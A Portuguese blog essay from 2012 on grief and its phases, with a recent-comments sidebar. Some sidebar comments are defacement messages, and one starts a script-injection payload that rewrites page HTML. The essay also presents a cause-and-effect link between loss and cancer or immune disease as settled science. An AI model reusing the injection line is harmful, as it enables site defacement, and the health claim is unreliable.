Ousar Ser @ 19:07

Sex, 27/04/12

“Nada se perde, tudo se transforma” é uma frase que encerra a própria verdade e, mesmo, o segredo da vida.

Perder algo ou alguém, importantes para nós, envolve um processo de luto que passa, muitas vezes, por “lutas”.

O processo de luto pode resumir-se em quatro fases: à fase inicial do desespero, segue-se uma fase de negação e protesto, na qual, se tenta recuperar o que foi perdido (mesmo que só imaginariamente). É esta vivência que dará lugar à fase de aceitação vivida, geralmente, com tristeza e depressão mas, condição indispensável para chegar à reconstrução, ao renascimento e a um reatar criativo de ligações com a nova realidade existencial da pessoa.

O “luto patológico” ocorre quando a pessoa se fixa numa destas fases e é, então, aqui que aparecem as “lutas” para negar a nova realidade. Percorrer este processo implica conhecer o “desenho” destas lutas, uma vez que é nelas que a pessoa mascara (até para si própria) a sua verdade, arrastando essa máscara por anos e sob as mais diversas formas.

Estas “lutas” de que falamos assumem, muitas vezes, a forma de somatizações ou doenças físicas, a precisar, efetivamente, de serem tratadas medicamente. É como que por “ o corpo a falar por nós”, sendo a doença o resultado do compromisso doentio, de emoções negadas, de tristezas não vividas, talvez, lágrimas não choradas ou raivas não exprimidas.

Hoje, é sobejamente conhecida, nos meios científicos, a relação causa/efeito entre doenças (cancro e doenças do sistema imunitário) e perdas inesperadas.

A segurança, a saúde e a liberdade de existir só podem vir, assim, da nossa capacidade de transformação, através dos nossos lutos diários: morremos hoje para ontem e amanhã morreremos para hoje”.

“Saber morrer” e “deixar morrer” tal é o preço de poder viver a nossa vida em plena saúde e em alegria.





Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO